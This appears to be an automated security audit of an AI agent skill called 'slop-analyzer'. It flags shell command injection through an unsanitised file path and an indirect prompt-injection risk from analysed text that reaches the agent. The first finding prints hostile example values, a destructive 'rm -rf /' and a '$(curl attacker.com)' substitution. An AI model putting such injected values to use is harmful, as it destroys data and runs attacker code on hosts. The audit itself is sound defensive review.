slop-analyzer
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
- [Command Execution] (HIGH): The skill executes a shell command using `bun run ./scripts/slop-score/analyze.js --all <filepath>`. There is no evidence of sanitization for the `<filepath>` parameter. An attacker could provide a malicious filename containing shell metacharacters (e.g., `; rm -rf /` or `$(curl attacker.com)`) to achieve arbitrary code execution on the host system.
- [Indirect Prompt Injection] (HIGH): This skill's primary function is to ingest and analyze untrusted external content (text files). It lacks explicit boundary markers or instructions to ignore embedded commands within the analyzed text.
  - Ingestion points: The text file content passed to the `analyze.js` script and subsequently processed by the agent.
  - Boundary markers: None specified in the prompt instructions to the agent.
  - Capability inventory: Capability to execute shell commands (`bun run`) and provide feedback that influences the parent agent's state/decisions.
  - Sanitization: None provided for the file content or the resulting output from the script.
- [Remote Code Execution] (MEDIUM): The skill relies on an external script located at `./scripts/slop-score/analyze.js`. While this is a local path, the security of the skill depends entirely on the integrity of this unprovided script. If this script is modified or downloaded from an untrusted source, it could perform malicious actions.
Recommendations
- AI detected serious security threats
Audit Metadata